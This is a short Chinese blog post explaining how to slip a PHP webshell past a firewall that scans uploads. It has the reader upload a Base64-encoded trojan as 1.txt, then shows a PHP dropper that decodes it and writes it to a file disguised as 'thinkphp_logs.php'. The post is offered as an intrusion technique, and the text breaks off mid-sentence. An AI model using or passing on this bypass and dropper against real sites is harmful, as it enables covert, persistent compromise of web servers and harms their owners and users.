Advertisement

突破网络过滤机制的一个高效传输方法

阅读量:

当我们访问某个网站的后台时,在兴奋地寻找是否有上传点的时候突然间注意到可以上传PHP文件。然而防火墙会根据文件内容进行检查,并且一旦检测到某些函数会被调用就会将上传的小马(指PHP脚本)删除掉。令人感到非常沮丧!

今天想简单记录一种绕过的方法:
具体步骤如下:首先编写一个简单的木马程序,在本地创建一个名为1.txt的文件,并对该木马代码进行Base64编码后保存至本地的1.txt文件中;接着将该文件传输至目标网站进行部署。

然后上传一个1.php,写入内容如下:

复制代码
    <?php
    $path = "./";
    $path = $path."1.txt";
    echo $path;
    //$fp = fopen("$path","r");
    //$str = fread($fp,filesize($path));
    $str = file_get_contents("$path","r");
    $str = base64_decode($str);
    echo $str;
    
    $handle = fopen("./thinkphp_logs.php","w");
    fwrite($handle,$str);
    fclose($handle);
    ?>

按照这样的方式,在t

全部评论 (0)

还没有任何评论哟~